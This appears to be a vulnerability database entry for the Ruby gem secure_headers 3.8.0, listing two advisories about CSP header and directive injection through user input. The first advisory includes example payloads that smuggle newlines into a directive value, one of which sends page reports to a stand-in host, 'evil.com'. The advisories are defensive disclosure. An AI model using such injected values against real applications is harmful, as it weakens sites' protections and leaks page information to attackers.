Search for packages
| purl | pkg:gem/secure_headers@3.8.0 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-1hff-pbpa-p3e5
Aliases: CVE-2020-5216 GHSA-w978-rmpf-qmwg |
Limited header injection when using dynamic overrides with user input in RubyGems secure_headers ### Impact If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection. Upon seeing a newline in the header, rails will silently create a new `Content-Security-Policy` header with the remaining value of the original string. It will continue to create new headers for each newline. e.g. ```ruby override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` ``` would result in ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: injected Content-Security-Policy: rest-of-the-header ``` CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: ```ruby override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) ``` ``` Content-Security-Policy: ... script-src: mycdn.com Content-Security-Policy: default-src 'none'; report-uri evil.com Content-Security-Policy: rest-of-the-header ``` ### Patches This has been fixed in 6.3.0, 5.2.0, and 3.9.0 ### Workarounds ```ruby override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) ``` ### References https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c [The effect of multiple policies](https://www.w3.org/TR/CSP3/#multiple-policies) ### For more information If you have any questions or comments about this advisory: * Open an issue in [this repo](https://github.com/twitter/secure_headers/security/advisories/new) * DM us at @ndm on twitter |
Affected by 0 other vulnerabilities. Affected by 0 other vulnerabilities. Affected by 0 other vulnerabilities. Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-utte-4yve-n7eq | Directive injection when using dynamic overrides with user input ### Impact If user-supplied input was passed into `append/override_content_security_policy_directives`, a semicolon could be injected leading to directive injection. This could be used to e.g. override a `script-src` directive. Duplicate directives are ignored and the first one wins. The directives in `secure_headers` are sorted alphabetically so they pretty much all come before `script-src`. A previously undefined directive would receive a value even if `SecureHeaders::OPT_OUT` was supplied. The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning when this happens. This will result in innocuous browser console messages if being exploited/accidentally used. In future releases, we will raise application errors resulting in 500s. > Duplicate script-src directives detected. All but the first instance will be ignored. See https://www.w3.org/TR/CSP3/#parse-serialized-policy > Note: In this case, the user agent SHOULD notify developers that a duplicate directive was ignored. A console warning might be appropriate, for example. ### Patches Depending on what major version you are using, the fixed versions are 6.2.0, 5.1.0, 3.8.0. ### Workarounds If you are passing user input into the above methods, you could filter out the input: ```ruby override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")]) ``` ### References Reported in https://github.com/twitter/secure_headers/issues/418 https://www.w3.org/TR/CSP3/#parse-serialized-policy ### For more information If you have any questions or comments about this advisory: * Open an issue in [this repo](https://github.com/twitter/secure_headers/issues/new) * DM @ndm on twitter |
CVE-2020-5217
GHSA-xq52-rv6w-397c |